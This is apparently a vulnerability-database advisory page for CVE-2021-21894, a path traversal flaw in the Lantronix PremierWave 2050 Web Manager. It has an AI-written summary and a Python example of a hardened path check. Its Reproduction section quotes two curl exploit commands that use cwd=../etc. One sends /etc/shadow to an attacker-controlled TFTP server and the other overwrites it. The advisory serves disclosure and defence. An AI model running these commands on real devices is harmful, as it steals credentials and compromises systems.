VYPR
Unrated severity · NVD Advisory · Published Dec 22, 2021 · Updated Aug 3, 2024

CVE-2021-21894


Description

A directory traversal vulnerability exists in the Web Manager FsTFtp functionality of Lantronix PremierWave 2050 8.9.0.0R4 (in QEMU). A specially crafted HTTP request can lead to arbitrary file overwrite or FsTFtp file disclosure. An attacker can make an authenticated HTTP request to trigger this vulnerability.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A directory traversal vulnerability in Lantronix PremierWave 2050 Web Manager FsTFtp allows authenticated attackers to overwrite or disclose arbitrary files.

Vulnerability

The FsTFtp functionality in the Web Manager of Lantronix PremierWave 2050 firmware version 8.9.0.0R4 (tested in QEMU) allows authenticated users with the filesystem privilege to direct a TFTP client to GET or PUT files. The cwd parameter in the HTTP POST request is not properly sanitized, enabling path traversal sequences (e.g., ../) to escape the intended /ltrx_user/ directory. This leads to arbitrary file overwrite and arbitrary file disclosure [1].

Exploitation

An attacker must have authenticated access to the Web Manager with the filesystem privilege. By sending a crafted HTTP POST request (e.g., ajax=FsTFtp&cmd=put&local=shadow&remote=shadow&host=...) and manipulating the cwd parameter with path traversal primitives, the attacker can direct the device's TFTP client to read or write files outside the restricted directory. No additional user interaction is required beyond the initial authentication [1].

Impact

Successful exploitation allows the attacker to read sensitive files (e.g., /etc/shadow) or overwrite arbitrary files on the device's filesystem. This can lead to disclosure of credentials, modification of system configuration, or complete compromise of the device. The CVSSv3 score is 9.1 (Critical) with a scope change, indicating high impact on confidentiality, integrity, and availability [1].

Mitigation

As of the publication date (2021-12-22), no official patch has been released by Lantronix. The product may be end-of-life; users should verify support status. Workarounds include restricting access to the Web Manager to trusted users only, disabling the FsTFtp feature if not required, and monitoring for anomalous TFTP traffic. This vulnerability is not listed on the CISA Known Exploited Vulnerabilities (KEV) catalog [1].

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Insufficient sanitization of the `cwd` HTTP POST parameter allows path traversal sequences to escape the restricted `/ltrx_user/` directory."

Attack vector

An authenticated attacker with filesystem privilege sends a crafted HTTP POST request to the Web Manager's FsTFtp feature. By setting the `cwd` parameter to a path traversal sequence such as `../etc`, the attacker can direct the device's TFTP client to read or write files outside the restricted `/ltrx_user/` directory [ref_id=1]. For file disclosure (CVE-2021-21894), the attacker uses `cmd=put` to upload a sensitive file like `/etc/shadow` to an attacker-controlled TFTP server. For arbitrary file overwrite (CVE-2021-21895), the attacker uses `cmd=get` to download a malicious file from a TFTP server into an arbitrary location on the device, overwriting files such as `/etc/shadow` or SSH authorized_keys while preserving original permissions [ref_id=1].

Affected code

The vulnerability exists in the Web Manager FsTFtp functionality of the Lantronix PremierWave 2050. The attacker-controlled HTTP POST parameter `cwd` is not fully sanitized before being composed into the final file path, allowing path traversal sequences like `../etc` to escape the intended `/ltrx_user/` directory [ref_id=1].

What the fix does

The advisory does not include a patch or specific remediation from the vendor. The root cause is insufficient sanitization of the `cwd` HTTP POST parameter, which allows path traversal sequences like `../` to bypass the intended restriction to the `/ltrx_user/` directory [ref_id=1]. A proper fix would require validating that the resolved file path remains within the allowed directory, rejecting any path traversal sequences that escape the `/ltrx_user/` prefix.
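The advisory gives no vendor fix, so the following is an added illustration of the check described above, written for this page and not taken from Lantronix firmware or from the advisory. It contrasts a naive path composition (which lets `cwd=../etc` resolve to `/etc/shadow`) with a hardened one that normalises the path and requires the result to stay under `/ltrx_user`, then applies that check to FsTFtp-style POST bodies. The function names (`compose_naive`, `compose_checked`, `validate_fstftp_request`) and the sample request bodies are assumptions constructed for the example; the real parameter handling on the device is not known.

```python
import posixpath
from urllib.parse import parse_qs

# Directory the FsTFtp feature is meant to stay within (named in the advisory).
BASE_DIR = "/ltrx_user"


def compose_naive(cwd: str, name: str) -> str:
    """Models the vulnerable behaviour: cwd and the file name are joined onto
    the base directory with no check on where the result ends up.
    Illustrative only; this is not the device's actual code."""
    return posixpath.normpath(posixpath.join(BASE_DIR, cwd, name))


def compose_checked(cwd: str, name: str) -> str:
    """Hardened composition: normalise the path, then require that it still
    lies under BASE_DIR. Raises ValueError on any attempt to escape.

    Purely lexical; on a real device, follow this with os.path.realpath()
    on the result so that symlinks inside BASE_DIR cannot point elsewhere."""
    if not name:
        raise ValueError("empty file name")
    for part in (cwd, name):
        # posixpath.join discards everything before an absolute component,
        # so an absolute cwd or name would silently replace BASE_DIR.
        if part.startswith("/"):
            raise ValueError(f"absolute path not allowed: {part!r}")
        if "\x00" in part:
            raise ValueError("NUL byte in path component")
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, cwd, name))
    # commonpath (not startswith) avoids the sibling-prefix trap:
    # "/ltrx_user_other/x" starts with "/ltrx_user" but is outside it.
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError(f"path escapes {BASE_DIR}: {candidate}")
    return candidate


def validate_fstftp_request(body: str) -> tuple:
    """Apply the check to an FsTFtp-style form body before any transfer
    is started. Returns (True, resolved_path) or (False, reason).
    Assumes the cwd and local parameters are the only ones that feed the
    local file path; that assumption is part of this example."""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    if params.get("ajax") != "FsTFtp":
        return (False, "not an FsTFtp request")
    cmd = params.get("cmd")
    if cmd not in ("get", "put"):
        return (False, f"unsupported cmd {cmd!r}")
    try:
        path = compose_checked(params.get("cwd", ""), params.get("local", ""))
    except ValueError as exc:
        return (False, str(exc))
    return (True, path)


if __name__ == "__main__":
    # Constructed sample bodies; addresses are from the documentation range.
    legit = ("ajax=FsTFtp&cmd=get&local=config.xml&remote=config.xml"
             "&host=198.51.100.10&port=69&submit=Transfer&cwd=backup")
    traversal = ("ajax=FsTFtp&cmd=put&local=shadow&remote=shadow"
                 "&host=198.51.100.10&port=69&submit=Transfer&cwd=../etc")
    print("naive  :", compose_naive("../etc", "shadow"))
    print("legit  :", validate_fstftp_request(legit))
    print("escape :", validate_fstftp_request(traversal))
```

The design point is that the decision is made on the resolved path rather than by filtering `../` substrings: encoded or doubled traversal sequences, an absolute `cwd`, and a sibling directory sharing the `/ltrx_user` prefix are all rejected by the same `commonpath` comparison, and any allow-list logic for the TFTP `host` parameter would sit alongside it.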

Preconditions

  • auth: Attacker must have valid credentials with filesystem privilege on the device
  • network: Attacker must have network access to the Web Manager interface
  • network: For file disclosure (PUT), attacker must control a TFTP server reachable from the device
  • network: For file overwrite (GET), attacker must control a TFTP server to serve the malicious file

Reproduction

The advisory provides the following curl command for file disclosure (CVE-2021-21894): `curl --user admin:PASS -d "ajax=FsTFtp&cmd=put&local=shadow&remote=shadow&host=192.168.0.254&port=69&submit=Transfer&cwd=../etc" http://192.168.0.1/` [ref_id=1]. For arbitrary file overwrite (CVE-2021-21895): `curl --user admin:PASS -d "ajax=FsTFtp&cmd=get&local=shadow&remote=shadow&host=192.168.0.254&port=69&submit=Transfer&cwd=../etc" http://192.168.0.1/` [ref_id=1].

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 1

News mentions: 0

No linked articles in our index yet.